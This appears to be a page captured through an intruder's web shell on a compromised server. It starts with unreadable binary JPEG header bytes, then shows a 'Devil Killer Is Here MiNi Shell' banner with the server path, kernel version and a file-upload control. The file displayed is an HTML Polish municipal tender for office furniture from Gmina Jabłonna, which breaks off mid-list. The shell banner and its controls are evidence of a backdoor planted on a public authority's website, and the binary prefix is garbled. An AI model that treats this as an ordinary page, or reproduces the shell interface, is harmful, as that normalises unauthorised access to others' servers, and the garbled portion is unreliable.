JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190924/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190924/601542-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 601542-N-2019 z dnia 2019-09-24 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Jabłonna</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa i montaż mebli do siedziby Urzędu Gminy Jabłonna</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Dostawa i montaż mebli do siedziby Urzedu Gminy Jabłonna</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Tak</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Jabłonna</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">53516100000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Majątek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">22</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">23-114</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Jabłonna</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">lubelskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">815 610 577, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@jablonna.lubelskie.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">815 610 065</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://ugjablonna.bip.lubelskie.pl/index.php?id=6</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa i montaż mebli do siedziby Urzędu Gminy Jabłonna</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.18.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowych mebli wraz z montażem do wskazanych przez Zamawiającego pomieszczeń znajdujących się w budynku Urzędu Gminy Jabłonna, Jabłonna-Majątek 26, 23-114 Jabłonna-MajątekZamawiający wymaga, aby oferowane meble spełniały wymagane parametry i standardy jakościowe wyszczególnione w szczegółowym opisie przedmiotu umowy.Oferowane i dostarczone elementy meblowe wraz z wyposażeniem muszą spełniać minimalne wymagania bezpieczeństwa i higieny pracy oraz ergonomii zawarte w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 1 grudnia 1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe (Dz. U. z 1998r.,Nr 148, poz. 973).Meble muszą być dopuszczone do obrotu na rynku krajowym.Użyte do produkcji mebli komponenty muszą posiadać atesty higieniczne lub inny równoważny dokument.Meble muszą spełniać wymagania aktualnie obowiązujących norm odnoszące się do jakości produktów oraz bezpieczeństwa ich użytkowania.Wykonawca w dniu podpisania protokołu odbioru końcowego bez uwag i zastrzeżeń ze strony Zamawiającego, zobowiązuje się do dostarczenia Zamawiającemu:1)	wszelkich atestów, certyfikatów, aprobat i świadectw wymaganych przepisami prawa na materiały użyte do produkcji,2)	wszelkich atestów, certyfikatów, aprobat i świadectw wymaganych przepisami prawa na wyprodukowane meble (gotowy produkt).Dostawa mebli będzie realizowana w terminach określonych w umowie.Zamawiający dopuszcza zmiany wymiarów: wysokości, głębokości i szerokości od podanych minimalnych wartości na poziomie +/-2 %.Wykonawca zobowiązany jest przed rozpoczęciem realizacji przedmiotu umowy do przedstawienia próbek i rozwiązań materiałowych do akceptacji Zamawiającego 12. Wszystkie rozwiązania techniczne i materiałowe mogą być zastąpione, przy zachowaniu cech równoważności.Wykonawca jest zobowiązany udzielić minimum 36 miesięcznej gwarancji na dostarczone meble, licząc od dnia podpisania protokołu odbioru końcowego bez uwag i zastrzeżeń ze strony Zamawiającego.Kolorystyka płyty meblowej - do ustalenia z Zamawiającym.Kolorystyka obić tapicerskich - do ustalenia z Zamawiającym.Oferent powinien dokonać wizji lokalnej i zwymiarowania pomieszczeń.Oferent powinien do oferty załączyć rysunki bądź zdjęcia oferowanych produktów.Oferent powinien przedstawić Zamawiającemu propozycje kolorów płyt meblowych oraz tkanin tapicerskich do wyboru. Należy uwzględnić możliwość łączenia kolorów w meblach np. inny kolor korpusu, inny frontów przy szafach i inny kolor blatu, inny stelaż biurek.Meble powinny być zmontowane, ustawione wg wskazówek Zamawiającego.Blaty biurek wyposażone w przepust kablowy - umiejscowienie do ustalenia z Zamawiającym.Płyta, z której wykonane są blaty biurek powinna mieć strukturę BS. Jeśli nie opisano inaczej - płyta meblowa 18mm na półki, elementy korpusu, 25mm na blaty i wieńce szaf i regałów oklejana obrzeżem PCV o grubości 2mm na blatach, wieńcach, bokach szaf i regałów oraz 0,6mm na półkach i elementach korpusu.Uchwyty metalowe w meblach biurowych o rozstawie 128mm, w meblach gabinetowych wpuszczane w płytę - kształt i wymiar wg propozycji Oferenta do uzgodnienia z Zamawiającym.Szczegółowe rodzaje mebli stanowiące przedmiot zamówienia:1.Biurko proste	Biurko wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki zregulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Wymiary: 160x70x75 cm 1 sztuka2.	Biurko proste	Biurko wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki zregulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Wymiary: 160x60x75 cm 2 sztuki3.	Biurko proste	Biurko wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki zregulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Wymiary: 140x60x75 cm 1 sztuka4.	Biurko kątowe w kształcie litery L - lewe	Biurko kątowe w kształcie litery L z zaokrąglonym wycięciem od strony użytkownika. Biurko wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Biurko lewe, wymiary: 160/70x105/50x75 cm	9 sztuka5.	Biurko kątowe w kształcie litery L - lewe	Biurko kątowe w kształcie litery L z zaokrąglonym wycięciem od strony użytkownika. Biurko wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Biurko lewe, wymiary: 160/60x105/50x75 cm	1 sztuka6.	Biurko kątowe w kształcie litery L - prawe	Biurko kątowe w kształcie litery L z zaokrąglonym wycięciem od strony użytkownika. Biurko wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych.Biurko prawe, wymiary: 160/70x105/50x75 cm	14 sztuk7.	Lada - pulpit	Biurko proste, wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Stopki z regulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych. Przednia ściana - blenda od blatu do podłoża z boniowaniem.Wymiary: 140x70x75 cm 1 sztuka8.	Nadstawka do lady z przegrodami na pocztę	Nadstawka wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm. Od strony użytkownika przegrody do przechowywania kopert formatu min. B5.Wymiary: 140x30x30 cm	1 sztuka9.	Lada - pulpit	Biurko proste, wykonane w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, stelaż z płyty 18mm. Stopki z regulacją, umożliwiającą wypoziomowanie. Pod blatem podwieszana szuflada na klawiaturę wysuwana za pomocą prowadnic kulkowych. Przednia ściana - blenda od blatu do podłoża z boniowaniem.Wymiary: 180x70x75 cm 1 sztuka10.	Nadstawka do lady	Nadstawka wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm. Przednia ściana boniowana.Wymiary: 180x30x30 cm	1 sztuka11. Kontener mobilny	Kontener podblatowy na kółkach z trzema szufladami, wyposażony w zamek centralny. Wykonany w całości z płyty meblowej melaminowanej w klasie higieny E1.Wymiary: 43x50x60 cm	3 sztuki12.	Dostawka do biurka z szufladami	Dostawka z czterema szufladami zamykanymi zamkiem centralnym, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Blat z płyty 25mm, korpus z płyty 18mm.Wymiary: 43x50x75 cm	27 sztuk13. Szafa aktowa 5-cio półkowa	Szafa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Dwudrzwiowa.Wymiary: 80x37x185 cm	66 sztuk14. Szafa aktowa 5-cio półkowa	Szafa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie. Jednodrzwiowa.Wymiary: 42x37x185	2 sztuki15.	Szafa aktowa 5-cio półkowa, półotwarta	Szafa z drzwiami zamykanymi zamkiem na wysokości dwóch dolnych przestrzeni składowania, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 80x37x185 cm	4 sztuki16.	Regał aktowy, otwarty, 5-cio półkowy	Regał wykonany w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 80x37x185 cm	7 sztuk17. Regał aktowy, otwarty, 5-cio półkowy	Regał wykonany w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 42x37x185 cm	2 sztuki18.	Szafa aktowa 3 półkowa	Szafa z drzwiami na całej wysokości, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 80x37x114 cm 7 sztuk19.	Szafa aktowa 3 półkowa	Szafa z drzwiami na wysokości dwóch dolnych przestrzeni składowania, zamykana zamkiem, wykonana w całości z płyty meblowej melaminowanej w klasie higieny E1. Wieńce z płyty 25mm, korpus z płyty 18mm. Połączenia płyty za pomocą mimośrodów. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 80x37x114 cm 1 sztuka20.	Wózek pod komputer	Wózek wykonany z blachy malowanej farbą proszkową na kolor do uzgodnienia z Zamawiającym, na kółkach 50mm.Wymiary dostosowane do wielkości obudowy jednostki centralnej - biurka. 28 sztuk21.	Szafka pod drukarkę	Szafka w całości wykonana z płyty meblowej melaminowanej w klasie higieny E1, zamykana. Dwie półki wewnątrz. Stopki z regulacją, umożliwiającą wypoziomowanie.Wymiary: 61x61x60 cm 7 sztuk22.	Dostawka do biurka zaokrąglona	Blat zaokrąglony wykonany z płyty meblowej melaminowanej w klasie higieny E1, o grubości 25mm, montowana do biurka, bądź biurek od spodu za pomocą płaskowników. Dostawka wspierana na nogach stalowych o średnicy 6 cm z regulowaną stopką. Wysokość dostawki dostosowana do wysokości biurek.Wymiary: 140x40x75 cm 4 sztuki23.	Dostawka do biurka zaokrąglona	Blat zaokrąglony wykonany z płyty meblowej melaminowanej w klasie higieny E1, o grubości 25mm, montowana do biurka, bądź biurek od spodu za pomocą płaskowników. Dostawka wspierana na nogach stalowych o średnicy 6 cm z regulowaną stopką. Wysokość dostawki dostosowana do wysokości biurek.Wymiary: 160x40x75 cm 6 sztuk24. Stół na stelażu metalowym	Blat z płyty meblowej melaminowanej w klasie higieny E1 ogrubości 25mm na stelażu ramowym, spawanym, wykonanym z kształtownika stalowego, malowanego farbą proszkową 20x30(rama) i 50x50(nogi). Stopki umożliwiające wypoziomowanie.Wymiary: 140x80x75 cm	5 sztuk25.	Stół na stelażu metalowym	Blat z płyty meblowej melaminowanej w klasie higieny E1 ogrubości 25mm na stelażu ramowym, spawanym, wykonanym z kształtownika stalowego, malowanego farbą proszkową 20x30(rama) i 50x50(nogi). Stopki umożliwiające wypoziomowanie.Wymiary:180x80x75 cm 1 sztuk26.	Stół na stelażu metalowym	Blat z płyty meblowej melaminowanej w klasie higieny E1 ogrubości 25mm na stelażu ramowym, spawanym, wykonanym z kształtownika stalowego, malowanego farbą proszkową 20x30(rama) i 50x50(nogi). Stopki umożliwiające wypoziomowanie.Wymiary: 120x80x75 cm	1 sztuk27.	Szafa metalowa do przechowywania dokumentów 